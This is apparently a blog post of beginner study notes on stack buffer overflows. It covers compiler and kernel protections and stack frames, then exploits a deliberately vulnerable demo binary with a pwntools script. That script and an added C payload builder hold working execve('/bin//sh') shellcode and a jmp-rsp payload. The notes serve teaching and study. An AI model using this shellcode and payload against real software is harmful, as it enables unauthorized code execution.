<h1>Stack Overflow: Beginner ROP Study Notes</h1>
<p>Post 1501 on mnihyc's Blog (<a href="https://0self.mnihyc.com/blog/archives/1501">https://0self.mnihyc.com/blog/archives/1501</a>), category: Security. Published 2020-05-07 19:27 UTC, last modified 2020-05-08 10:04 UTC. Author: mnihyc.</p>
<p>After my first CTF I once again realised how shallow my understanding of <strong>stack overflows</strong> had been, so I used the few days I had left <span style="color: #ffffff;"><del>(shouldn't that time have gone to catching up on homework?)</del></span> to study the principles and application of beginner-level ROP.</p>
<p>These are beginner notes, so if you are already an expert, please feel free to skip this. ((</p>
<hr />
<!--more-->
<ul>
<li>
<h3>Contents</h3>
<ul>
<li>Prerequisites
<ul>
<li><a href="#t_pre"><strong>Stack overflow protection mechanisms</strong></a></li>
<li><a href="#t_prestack"><strong>Stack operations in function calls</strong></a></li>
</ul>
</li>
<li>Start pwning
<ul>
<li><strong><a href="#t_aslronly">ASLR only</a></strong></li>
<li><a href="#t_withnx"><strong>ASLR + NX</strong></a></li>
</ul>
</li>
</ul>
</li>
</ul>
<p>More to come...</p>
<a id="t_pre"></a>
<hr />
<h3><strong>Stack overflow protection mechanisms</strong></h3>
<p>Take this small program:</p>
<pre>#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
int main()
{
        int i=0;
        char buf[64];          /* 64-byte local buffer...                        */
        read(0,buf,0x200);     /* ...but up to 0x200 bytes are read into it:    */
        printf("%d\n",i);      /* the stack overflow this post is about         */
        return 0;
}
</pre>
<p>Compile it with <code>gcc temp.c -o temp</code> and check its protections with <code>python3 -c 'from pwn import *; ELF("temp")'</code> (pwntools prints a checksec summary when it loads an ELF):</p>
<img class="alignnone size-full wp-image-1504" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/N_5N@AB6@O2HUN6M1H6B.png" alt="pwntools checksec output for the default gcc build" width="507" height="107" />
<p>With the default compiler flags the protections are already on, which makes the binary hard to break. In brief:</p>
<ul>
<li>
<p><strong>RELRO (Relocation Read-Only)</strong> comes in two levels. With Partial RELRO the loader makes the non-PLT part of the GOT and the other relocated sections read-only once it has processed them, but <code>.got.plt</code> stays writable because functions are resolved lazily on first call, so overwriting a GOT entry is still possible. Full RELRO (<code>-z relro -z now</code>) resolves every symbol at load time and then makes the whole GOT read-only, which closes the GOT-overwrite primitive. (The PLT itself is code and is never writable at either level.)</p>
</li>
<li><strong>Stack Canary</strong> found means stack protection (<code>-fstack-protector</code>): the function prologue stores a canary value (treat it as random; on x86-64 glibc it is read from <code>fs:0x28</code> and its lowest byte is zero so that string functions cannot copy it) between the local variables and the saved RBP/return address, and the epilogue compares it before <code>ret</code>. If it has changed, the program aborts with <code>*** stack smashing detected ***</code>. The compiler may also reorder locals so that character arrays sit directly below the canary, above the scalar variables, which limits what an overflow can reach. The MSVC equivalent is <code>/GS</code>.</li>
<li><strong>NX (No-Execute)</strong> enabled means the stack (and other data mappings) carry no execute permission, so the classic technique of jumping into shellcode placed on the stack (via <code>jmp esp</code> and the like) stops working. On Windows this is called <strong>DEP (Data Execution Prevention)</strong>.</li>
<li><strong>ASLR (Address Space Layout Randomization)</strong> is usually on by default in the OS. On every run it randomises the base address of the shared libraries (libc etc.), the stack and the heap; because mappings are page-aligned, only the middle bits change and the low 12 bits (the last three hex digits) of any given address stay the same, which is what makes partial overwrites and leak-plus-offset arithmetic work. It is a kernel setting rather than a property of the binary: check it with <code>cat /proc/sys/kernel/randomize_va_space</code>, where 0 is off, 1 randomises the stack, mmap regions (shared libraries) and the VDSO, and 2 additionally randomises the brk heap.</li>
<li><strong>PIE (Position Independent Executable)</strong> enabled is what makes address randomisation complete: on top of ASLR, the executable's own base is randomised too, so you can no longer hard-code the addresses of the program's functions, PLT/GOT entries or gadgets; you need an address leak first.</li>
<li><strong>Fortify</strong> (<code>_FORTIFY_SOURCE</code>) makes the compiler replace calls to overflow-prone functions such as <code>strcpy</code>, <code>memcpy</code> and <code>read</code> with checked variants (<code>__strcpy_chk</code> and friends) wherever it can determine the destination buffer's size, so an overflow aborts at run time instead of corrupting memory. It only takes effect with optimisation enabled (<code>-O1</code> or higher, hence the usual advice to build with <code>-O2</code>).</li>
<li><strong>and so on</strong></li>
</ul>
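<p>Most of the flags in that checksec output are read straight out of the ELF headers, so here is how the lookup works. This is an added example, not code from the original post: it parses an ELF64 image held in memory and reports NX (from the PT_GNU_STACK flags), PIE (from e_type) and partial versus full RELRO (a PT_GNU_RELRO segment plus DT_BIND_NOW / DF_BIND_NOW in the dynamic section). The images it analyses are constructed in memory by build_image() to mirror the two builds in this post (the default gcc build and the -no-pie -z execstack one) and are not real binaries. Canary and FORTIFY detection needs the dynamic symbol table (imported __stack_chk_fail and *_chk symbols) and is left out, and ASLR is a kernel setting that no file header records.</p>

```c
/* elf_prot.c: read the binary-side hardening flags (NX, PIE, RELRO) from an
 * ELF64 image in memory, in the spirit of the checksec output above.
 * Added example, not code from the original post. Sample images are
 * constructed by build_image(), not taken from real files. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Minimal ELF64 definitions (same layout and values as <elf.h>). */
#define ET_EXEC 2
#define ET_DYN 3
#define PT_DYNAMIC 2
#define PT_GNU_STACK 0x6474e551u
#define PT_GNU_RELRO 0x6474e552u
#define PF_X 1u
#define DT_NULL 0
#define DT_BIND_NOW 24
#define DT_FLAGS 30
#define DF_BIND_NOW 8u

typedef struct {
    unsigned char e_ident[16];
    uint16_t e_type, e_machine; uint32_t e_version;
    uint64_t e_entry, e_phoff, e_shoff; uint32_t e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
} Ehdr;                                                       /* 64 bytes */
typedef struct { uint32_t p_type, p_flags;
    uint64_t p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align; } Phdr; /* 56 bytes */
typedef struct { int64_t d_tag; uint64_t d_val; } Dyn;       /* 16 bytes */

static const unsigned char ELF_MAGIC[5] = { 0x7f, 'E', 'L', 'F', 2 }; /* 2 == ELFCLASS64 */

enum relro { RELRO_NONE, RELRO_PARTIAL, RELRO_FULL };
struct prot { int pie, nx; enum relro relro; };

/* Returns 0 and fills *out, or -1 if img is not a sane ELF64 image. */
int elf_protections(const uint8_t *img, size_t len, struct prot *out)
{
    Ehdr eh; int bind_now = 0;
    if (len < sizeof eh) return -1;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELF_MAGIC, sizeof ELF_MAGIC) != 0) return -1;
    if (eh.e_phentsize != sizeof(Phdr) || eh.e_phoff > len ||
        (uint64_t)eh.e_phnum * sizeof(Phdr) > len - eh.e_phoff) return -1;

    out->pie = (eh.e_type == ET_DYN);   /* ET_EXEC is loaded at a fixed base */
    out->nx = 0;                        /* no PT_GNU_STACK at all: stack executable */
    out->relro = RELRO_NONE;
    for (uint16_t i = 0; i < eh.e_phnum; i++) {
        Phdr ph;
        memcpy(&ph, img + eh.e_phoff + (size_t)i * sizeof ph, sizeof ph);
        if (ph.p_type == PT_GNU_STACK) out->nx = !(ph.p_flags & PF_X);
        else if (ph.p_type == PT_GNU_RELRO) out->relro = RELRO_PARTIAL;
        else if (ph.p_type == PT_DYNAMIC) {
            if (ph.p_offset > len || ph.p_filesz > len - ph.p_offset) return -1;
            for (uint64_t off = 0; off + sizeof(Dyn) <= ph.p_filesz; off += sizeof(Dyn)) {
                Dyn d; memcpy(&d, img + ph.p_offset + off, sizeof d);
                if (d.d_tag == DT_NULL) break;
                if (d.d_tag == DT_BIND_NOW || (d.d_tag == DT_FLAGS && (d.d_val & DF_BIND_NOW)))
                    bind_now = 1;       /* -z now: all symbols resolved before RELRO applies */
            }
        }
    }
    /* Full RELRO needs both a RELRO segment and eager binding; with lazy
     * binding .got.plt must stay writable, so it is only partial. */
    if (out->relro == RELRO_PARTIAL && bind_now) out->relro = RELRO_FULL;
    return 0;
}

/* Constructed ELF64 image: header, up to 3 program headers, 2 dynamic entries. */
size_t build_image(uint8_t *buf, size_t cap, uint16_t e_type,
                   int exec_stack, int relro, int bind_now)
{
    Ehdr eh; Phdr ph[3]; Dyn dyn[2]; uint16_t n = 0;
    size_t dynoff = sizeof eh + sizeof ph, total = dynoff + sizeof dyn;
    if (cap < total) return 0;
    memset(&eh, 0, sizeof eh); memset(ph, 0, sizeof ph); memset(dyn, 0, sizeof dyn);
    memcpy(eh.e_ident, ELF_MAGIC, sizeof ELF_MAGIC);
    eh.e_type = e_type; eh.e_machine = 62; eh.e_version = 1;   /* 62 == EM_X86_64 */
    eh.e_ehsize = sizeof eh; eh.e_phoff = sizeof eh; eh.e_phentsize = sizeof(Phdr);
    ph[n].p_type = PT_GNU_STACK; ph[n].p_flags = 6u | (exec_stack ? PF_X : 0u); n++;
    if (relro) { ph[n].p_type = PT_GNU_RELRO; ph[n].p_flags = 4u; n++; }
    ph[n].p_type = PT_DYNAMIC; ph[n].p_flags = 6u;
    ph[n].p_offset = dynoff; ph[n].p_filesz = sizeof dyn; n++;
    eh.e_phnum = n;
    dyn[0].d_tag = DT_FLAGS; dyn[0].d_val = bind_now ? DF_BIND_NOW : 0; /* dyn[1] is DT_NULL */
    memcpy(buf, &eh, sizeof eh); memcpy(buf + sizeof eh, ph, sizeof ph);
    memcpy(buf + dynoff, dyn, sizeof dyn);
    return total;
}

/* Build a sample with the given flags and analyse it. */
int describe(uint16_t e_type, int exec_stack, int relro, int bind_now, struct prot *p)
{
    uint8_t buf[512];
    size_t n = build_image(buf, sizeof buf, e_type, exec_stack, relro, bind_now);
    return n ? elf_protections(buf, n, p) : -1;
}

static void print_prot(const char *label, const struct prot *p)
{
    static const char *relro_names[] = { "No RELRO", "Partial RELRO", "Full RELRO" };
    printf("%-24s %-13s NX %-8s PIE %s\n", label, relro_names[p->relro],
           p->nx ? "enabled" : "disabled", p->pie ? "enabled" : "disabled");
}

int main(void)
{
    struct prot p;
    if (describe(ET_DYN, 0, 1, 0, &p) == 0) print_prot("gcc temp.c (default)", &p);
    if (describe(ET_EXEC, 1, 0, 0, &p) == 0) print_prot("-no-pie -z execstack", &p);
    if (describe(ET_DYN, 0, 1, 1, &p) == 0) print_prot("-Wl,-z,relro,-z,now", &p);
    return 0;
}
```

<p>The same walk over the program headers is what <code>readelf -l</code> shows you by hand: look for <code>GNU_STACK</code> without the <code>E</code> flag, a <code>GNU_RELRO</code> entry, and <code>Type: DYN</code> in the file header.</p>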
<a id="t_prestack"></a>
<hr />
<h3><strong>Stack operations in function calls</strong></h3>
<p>Everyone knows that function calls are implemented through "stack operations", but what exactly happens, and what does the stack look like?</p>
<p>On x86 the CPU has 32-bit registers such as eax, ebx, ecx, edx, esi, edi, ebp and esp; of these, eip, ebp and esp are the ones tied closely to the stack handling of a function call. (On x86-64 they become rax, rbx, rcx, rdx, rsi, rdi, rbp and rsp, eight new 64-bit registers R8 to R15 are added, and eip becomes rip.)</p>
<p>RIP (Instruction Pointer) is the critical one: it holds the address of the next instruction the CPU will execute.</p>
<p>RBP (Base Pointer) points at the start of the current stack frame for the frame's whole life, at least in code built with frame pointers (gcc keeps them at -O0; optimised builds often omit them and address locals relative to RSP instead).</p>
<p>RSP (Stack Pointer) always points at the top of the stack, i.e. the most recently pushed element, which is the lowest address in use.</p>
<p>Because the stack is LIFO (last in, first out), arguments are said to be "pushed from right to left": pushing them in reverse order puts the first argument closest to the return address, so the callee finds argument N at a fixed offset from its frame regardless of how many arguments follow it.</p>
<p>Note that on x86-64 (System V ABI) there are more registers, so the first six integer or pointer arguments travel in RDI, RSI, RDX, RCX, R8 and R9; only the seventh and later go on the stack. This is also why 64-bit ROP chains need gadgets such as <code>pop rdi; ret</code> to set up arguments, whereas on 32-bit the arguments can simply be laid out on the stack after the return address.</p>
<p>Now let's see what happens to the stack when a function is called.</p>
<img class="alignnone size-full wp-image-1507" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/ODLU@4XB0R5Q3EUM.png" alt="Caller's and callee's stack frames" width="841" height="521" />
<p>Calling a function amounts to saving the caller's state in the caller's stack frame and extending the stack toward lower addresses to create a new callee's stack frame.</p>
<p>Step by step:</p>
<p>First, if there are stack arguments, they are pushed into the current frame (blue part).</p>
<img class="alignnone size-full wp-image-1509" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/OQ1VQ8MW7RF5Y8F0_ZR.png" alt="Arguments pushed into the caller's frame" width="544" height="517" />
<p>Next, <code>call</code> pushes the address of the instruction that follows it (the return address), and the callee's prologue pushes the current RBP.</p>
<p>Once both are on the stack, RBP is set to the current stack top (RSP), so the new frame starts at the saved RBP.</p>
<img class="alignnone size-full wp-image-1519" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/K9GRW0GKUUB13KH_WVL.png" alt="Return address and caller's RBP pushed, RBP moved to RSP" width="416" height="609" />
<p>That completes the <code>call</code>, and execution continues inside the callee. Whether it declares local variables or calls further functions, RSP keeps pointing at the top of the stack and its value keeps decreasing (the stack grows from high addresses to low).</p>
<img class="alignnone size-full wp-image-1517" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/TKK328BMAV5SSRNGU8.png" alt="Callee's frame with local variables below the saved RBP" width="418" height="641" />
<p>When leaving the function, keeping the stack balanced is essential: it must end up in the state it had when this function was called.</p>
<p>First the local variables are discarded by resetting RSP to RBP, which brings us back to the state of the two figures above.</p>
<p>Then the caller's RBP is popped, restoring RBP to where it was.</p>
<img class="alignnone size-full wp-image-1512" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/UOBUG6R2910L0ZC.png" alt="leave: locals dropped and caller's RBP restored" width="460" height="567" />
<p>Then comes the key step: the return address is popped from the stack into RIP (equivalent to a jmp), the CPU continues with the caller's next instruction, the caller removes any stack arguments, and the stack is back to exactly how it was before the call.</p>
<img class="alignnone size-full wp-image-1513" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/S9ILIE4FO_M4C6.png" alt="ret: return address popped into RIP" width="442" height="520" />
<img class="alignnone size-full wp-image-1521" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/QNG5M6@GNC_EL4FGA3.png" alt="Stack after the return, identical to before the call" width="403" height="313" />
<p>That is the whole call + leave + ret sequence of a function call (the pushing and popping of arguments is not part of it).</p>
<p>Loosely speaking: <code>call</code> is <code>push &lt;address of next instruction&gt;; jmp &lt;target&gt;</code>; the callee's prologue <code>push rbp; mov rbp, rsp</code> is what finishes setting up the frame; <code>leave</code> is <code>mov rsp, rbp; pop rbp</code>; and <code>ret</code> is <code>pop rip</code>. (RIP cannot be pushed or popped directly; these describe the effect, not real encodings.)</p>
<p>So how does a buffer overflow come about?</p>
<img class="alignnone size-full wp-image-1514" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/6MT25IWOHDZP327.png" alt="Buffer filled upward past its end into the saved RBP and return address" width="587" height="513" />
<p>It comes down to a key mismatch: the stack grows from high addresses to low, while a buffer is filled from low addresses to high. Writing past the end of a local buffer therefore walks upward into the saved RBP and the return address of the current frame, and whoever controls the return address controls where the program goes next.</p>
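<p>To make the frame layout and the possible endings of <code>ret</code> concrete, here is a byte-level model of the frame gcc -O0 gives this post's main(). This is an added example, not code from the original post, and it executes nothing attacker-controlled: it lays out buf[64], the padding above it, the saved rbp and the return address 88 bytes from buf (the distance this post later measures with a cyclic pattern), copies input the way read(0, buf, 0x200) would, then emulates leave and ret, including the general-protection fault a non-canonical return address raises and the abort a canary would trigger first. FRAME_RBP, GOOD_RET and CANARY are constructed values; RET_INSN is the post's 0x400578 (main+65).</p>

```c
/* frame_model.c: byte-level model of the stack frame gcc -O0 gives the
 * post's main(): buf[64] at rbp-0x50, i at rbp-0x54, canary at rbp-8 when
 * built with -fstack-protector, saved rbp at rbp, return address at rbp+8.
 * Added example, not code from the original post; all addresses below are
 * constructed except RET_INSN, which is the post's main+65. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define FRAME         0x68   /* bytes modelled; index 0 == rbp-0x58 */
#define BUF_OFF       0x08   /* buf           at rbp-0x50 */
#define CANARY_OFF    0x50   /* canary        at rbp-0x08 */
#define SAVED_RBP_OFF 0x58   /* caller's rbp  at rbp+0x00 */
#define RET_OFF       0x60   /* return addr   at rbp+0x08  (88 bytes past buf) */

#define RET_INSN  0x400578ULL              /* the ret in main, from the post */
#define FRAME_RBP 0x7ffd00001000ULL        /* constructed rbp inside main */
#define GOOD_RET  0x7f1234567890ULL        /* constructed return site in the caller */
#define CANARY    0x3a5f8c1d9e2b4700ULL    /* constructed; low byte 0 like glibc */

enum outcome { RET_OK, RET_HIJACKED, RET_GPFAULT, CANARY_ABORT };
struct cpu { uint64_t rip, rsp, rbp; };

static void store64(uint8_t *p, uint64_t v) { for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static uint64_t load64(const uint8_t *p) { uint64_t v = 0; for (int i = 7; i >= 0; i--) v = (v << 8) | p[i]; return v; }

/* User-mode addresses are canonical only if bits 63..47 are all zero. */
static int canonical_user(uint64_t a) { return (a >> 47) == 0; }

/* Run main's body against attacker input: read(0, buf, 0x200), then the
 * canary check (if canary_on), leave and ret. *target receives whatever
 * ended up in the return-address slot. */
enum outcome run_frame(const uint8_t *input, size_t len, int canary_on,
                       struct cpu *cpu, uint64_t *target)
{
    uint8_t stack[FRAME];
    memset(stack, 0, sizeof stack);
    store64(stack + CANARY_OFF, CANARY);
    store64(stack + SAVED_RBP_OFF, FRAME_RBP + 0x40);   /* caller's rbp */
    store64(stack + RET_OFF, GOOD_RET);

    /* read() copies whatever arrives, up to 0x200 bytes: nothing ties it to
     * sizeof buf. Bytes beyond the modelled frame would hit the caller's frame. */
    size_t n = len < 0x200 ? len : 0x200;
    if (n > FRAME - BUF_OFF) n = FRAME - BUF_OFF;
    memcpy(stack + BUF_OFF, input, n);

    if (canary_on && load64(stack + CANARY_OFF) != CANARY)
        return CANARY_ABORT;                  /* __stack_chk_fail: abort, no ret */

    /* leave == mov rsp, rbp ; pop rbp */
    cpu->rsp = FRAME_RBP;
    cpu->rbp = load64(stack + SAVED_RBP_OFF);
    cpu->rsp += 8;                            /* rsp now points at the return address */

    /* ret == pop rip. A non-canonical target raises #GP on the ret itself,
     * so rip still shows the ret and rsp has not moved (what the post sees in gdb). */
    *target = load64(stack + RET_OFF);
    if (!canonical_user(*target)) { cpu->rip = RET_INSN; return RET_GPFAULT; }
    cpu->rip = *target;
    cpu->rsp += 8;                            /* a jmp rsp gadget would land right here */
    return *target == GOOD_RET ? RET_OK : RET_HIJACKED;
}

static const char *outcome_name(enum outcome o)
{
    static const char *names[] = { "clean return", "return address hijacked",
                                   "#GP at ret (non-canonical target)", "canary abort" };
    return names[o];
}

int main(void)
{
    struct cpu c; uint64_t t;
    uint8_t pattern[96], payload[96];
    memset(pattern, 'A', sizeof pattern);          /* stand-in for a cyclic pattern */
    memset(payload, 'C', 88);                      /* the post's filler */
    store64(payload + 88, 0x60057eULL);            /* the post's jmp rsp address */

    enum outcome o = run_frame(pattern, sizeof pattern, 0, &c, &t);
    printf("%-34s rip=%#llx rsp=%#llx slot=%#llx\n", outcome_name(o),
           (unsigned long long)c.rip, (unsigned long long)c.rsp, (unsigned long long)t);
    o = run_frame(payload, sizeof payload, 0, &c, &t);
    printf("%-34s rip=%#llx rsp=%#llx\n", outcome_name(o),
           (unsigned long long)c.rip, (unsigned long long)c.rsp);
    o = run_frame(payload, sizeof payload, 1, &c, &t);
    printf("%s\n", outcome_name(o));
    return 0;
}
```

<p>Two details worth noticing in the model: 88 bytes of input overwrite only the saved rbp and still return cleanly (the damage shows up later, in the caller), and after a successful hijack rsp points at the byte immediately after the return address, which is exactly why shellcode placed there is reached by a <code>jmp rsp</code>.</p>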
<a id="t_aslronly"></a>
<hr />
<h3><strong>ASLR only</strong></h3>
<p>Compile with <code>gcc temp.c -o temp -fno-stack-protector -no-pie -z execstack</code>: no canary, no PIE, executable stack. ASLR stays on because it is a kernel setting, not a compiler one.</p>
<img class="alignnone size-full wp-image-1506" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/DJH0CWMZIA955UN3OX0E.png" alt="checksec output for the build with canary, PIE and NX disabled" width="508" height="126" />
<p>Frankly, isn't this just "do whatever you like"?? ((</p>
<p>The basic procedure:</p>
<p>Open gdb-peda</p>
<img class="alignnone size-full wp-image-1524" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/TESLRKDR65MRRO3PCVY.png" alt="gdb-peda started on temp" width="629" height="260" />
<p>Create a cyclic pattern (<code>pattern create</code>)</p>
<img class="alignnone size-full wp-image-1525" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/JIP_C1BRPZSH19F2P02A.png" alt="pattern create output" width="399" height="35" />
<p>Run the program and feed it the pattern</p>
<img class="alignnone size-full wp-image-1526" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/RZOU707S0FB_KDUVDXVY.png" alt="peda context at the crash" width="857" height="995" />
<p>It dies at <code>0x400578 &lt;main+65&gt;: ret</code>.</p>
<p>At this point RSP still points at the return address: the pattern bytes sitting there do not form a canonical 64-bit address, so <code>ret</code> raises a general-protection fault at the <code>ret</code> instruction itself and never completes, leaving RSP where it was. (This does not happen on 32-bit x86: every 32-bit value is a valid address, so <code>ret</code> completes and the crash happens afterwards, when the CPU tries to fetch from EIP = 0x41414141 or similar.)</p>
<p>So we only need to look up the offset of the bytes at RSP within the pattern (<code>pattern offset</code>) to know exactly where in our input the return address sits.</p>
<img class="alignnone size-full wp-image-1527" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/U5C9CQ5D63WKN9F2.png" alt="pattern offset result" width="291" height="63" />
<p>Next, search for a <code>jmp rsp</code> to use as a trampoline.</p>
<img class="alignnone size-full wp-image-1529" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/8A37QRH_0Z3C2@9SQYO.png" alt="Searching the binary for jmp rsp" width="501" height="212" />
<p>Under x64 a <code>jmp rsp</code> is generally hard to find, whereas under x86 a <code>jmp esp</code> is easy to come by.</p>
<p>So for the x64 demo we sneak an extra function <code>void dummy(){ __asm__("nop; jmp rsp"); }</code> into the source when compiling, which guarantees the gadget exists.</p>
<img class="alignnone size-full wp-image-1530" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/7HHP4037JSASYKOXR.png" alt="jmp rsp found after adding dummy()" width="417" height="159" />
<p>With a <code>jmp rsp</code> trampoline the payload is easy to construct: after <code>ret</code> pops our address, RSP points at the bytes that follow it in the input, so the shellcode goes directly after the return address.</p>
<p>For how to write the shellcode itself, see: <a href="https://bufferoverflows.net/developing-custom-shellcode-x64-linux/">https://bufferoverflows.net/developing-custom-shellcode-x64-linux/</a></p>
<pre>from pwn import *

context.arch = 'amd64'

# execve("/bin//sh", ["/bin//sh", NULL], NULL) on x86-64
shellcode = b''
shellcode += asm("xor rdx, rdx")                  # rdx = 0, reused as NULL and as envp
shellcode += asm("push rdx")                      # terminating NUL for the string
shellcode += asm("mov rax, 0x68732f2f6e69622f")   # "/bin//sh" in little-endian
shellcode += asm("push rax")
shellcode += asm("mov rdi, rsp")                  # rdi = pointer to "/bin//sh"
shellcode += asm("push rdx")                      # argv[1] = NULL
shellcode += asm("push rdi")                      # argv[0] = "/bin//sh"
shellcode += asm("mov rsi, rsp")                  # rsi = argv
shellcode += asm("xor rax, rax")
shellcode += asm("mov al, 0x3B")                  # SYS_execve
shellcode += asm("syscall")

# 88 bytes reach the return address (pattern offset above), then the jmp rsp
# gadget, then the shellcode, which is where rsp points after ret.
# sendline() appends a newline; read() simply stores it after the shellcode.
payload = b'C' * 88 + p64(0x000000000060057e) + shellcode

p = process('./temp')
p.sendline(payload)
p.interactive()
</pre>
<p>One caveat about the gadget address: 0x60057e lies in the binary's second (data) LOAD mapping of a <code>-no-pie</code> build, not in .text. Jumping there works only because, on x86-64 kernels before 5.8, an executable-stack marking (the PT_GNU_STACK X bit that <code>-z execstack</code> sets) also made the kernel apply READ_IMPLIES_EXEC, which turns every readable mapping executable. On a newer kernel that jump faults; if the search also reports the gadget at a 0x400xxx address inside .text, prefer that one.</p>
<p>Shell obtained.</p>
<img class="alignnone size-full wp-image-1531" src="https://0self.mnihyc.com/blog/wp-content/uploads/2020/05/L9YNNLDZMAOF7X022QST.png" alt="Interactive shell after running the exploit" width="373" height="170" />
<p>(Aside: with ASLR disabled you can skip the trampoline and simply hard-code the stack address of the shellcode as the return address.</p>
<p>Worth mentioning: Windows only introduced ASLR with Vista, which means XP has no ASLR at all.)</p>
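<p>The pwntools script above glosses over two checks that matter as soon as this payload shape is reused against a different input path. This is an added example, not code from the original post: it rebuilds the same payload in C (88 filler bytes, the gadget address packed little-endian as p64() does, then the shellcode) and checks it against the byte-value restrictions of the sink. read(0, buf, 0x200) accepts any byte value, so only the length matters; a gets()/fgets() sink would end the input at the first 0x0a, and a strcpy() sink at the first 0x00, which the upper bytes of 0x000000000060057e contain. The SHELLCODE bytes are one hand-assembled encoding of the post's listing (other assemblers may choose equivalent encodings); offset 88 and address 0x60057e are the post's own values.</p>

```c
/* payload.c: assemble the post's payload ('C' * 88 + p64(gadget) + shellcode)
 * and run the pre-flight checks: does it fit the sink, and does it contain a
 * byte the input path would stop at? Added example, not code from the
 * original post. SHELLCODE is a hand-assembled encoding of the post's listing. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* execve("/bin//sh", ["/bin//sh", NULL], NULL): 30 bytes, no 0x0a byte. */
static const uint8_t SHELLCODE[] = {
    0x48, 0x31, 0xd2,                                           /* xor rdx, rdx        */
    0x52,                                                       /* push rdx (NUL)      */
    0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, /* mov rax, "/bin//sh" */
    0x50,                                                       /* push rax            */
    0x48, 0x89, 0xe7,                                           /* mov rdi, rsp        */
    0x52,                                                       /* push rdx (argv end) */
    0x57,                                                       /* push rdi            */
    0x48, 0x89, 0xe6,                                           /* mov rsi, rsp        */
    0x48, 0x31, 0xc0,                                           /* xor rax, rax        */
    0xb0, 0x3b,                                                 /* mov al, 59 (execve) */
    0x0f, 0x05                                                  /* syscall             */
};

/* p64(): little-endian 8-byte pack, as pwntools does for amd64. */
static void p64(uint8_t *out, uint64_t v) { for (int i = 0; i < 8; i++) out[i] = (uint8_t)(v >> (8 * i)); }

/* Build filler + return address + shellcode into out. Returns the payload
 * length, -1 if it does not fit cap, or -2 if some byte is listed in
 * badchars (its index is stored in *bad_at when bad_at is non-NULL). */
long build_payload(uint8_t *out, size_t cap, size_t offset, uint64_t ret_addr,
                   const uint8_t *sc, size_t sclen,
                   const uint8_t *badchars, size_t nbad, size_t *bad_at)
{
    size_t total = offset + 8 + sclen;
    if (total > cap) return -1;
    memset(out, 'C', offset);                 /* covers buf, the padding above it, saved rbp */
    p64(out + offset, ret_addr);              /* lands exactly on the return address */
    memcpy(out + offset + 8, sc, sclen);      /* what rsp points at after ret; jmp rsp runs it */
    for (size_t i = 0; i < total; i++)
        for (size_t b = 0; b < nbad; b++)
            if (out[i] == badchars[b]) { if (bad_at) *bad_at = i; return -2; }
    return (long)total;
}

int main(void)
{
    uint8_t buf[0x200]; size_t at = 0;
    const uint8_t nl[] = { 0x0a }, nul[] = { 0x00 };

    /* read(0, buf, 0x200): any byte value is fine, only the length matters. */
    long n = build_payload(buf, sizeof buf, 88, 0x60057eULL, SHELLCODE, sizeof SHELLCODE, NULL, 0, &at);
    printf("read() sink:   payload of %ld bytes, fits 0x200\n", n);

    /* A gets()/fgets() sink would end the input at the first newline byte. */
    n = build_payload(buf, sizeof buf, 88, 0x60057eULL, SHELLCODE, sizeof SHELLCODE, nl, 1, &at);
    printf("gets() sink:   %s\n", n > 0 ? "ok, no 0x0a in payload" : "0x0a inside payload");

    /* A strcpy() sink stops at the first NUL, which the address's upper bytes contain. */
    n = build_payload(buf, sizeof buf, 88, 0x60057eULL, SHELLCODE, sizeof SHELLCODE, nul, 1, &at);
    printf("strcpy() sink: %s (first 0x00 at offset %zu)\n", n == -2 ? "truncated" : "ok", at);
    return 0;
}
```

<p>The NUL case is the one that bites in practice: a 64-bit code address always has at least two zero upper bytes, so against a string-copy sink the overwrite has to stop at the return address (with the zero bytes supplied by the copy's own terminator) and the shellcode has to live somewhere else.</p>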
<a id="t_withnx"></a>
<hr />
<h3><strong>ASLR + NX</strong></h3>
<p>Damn it, the homework is never going to get finished. No more updates for now.</p>
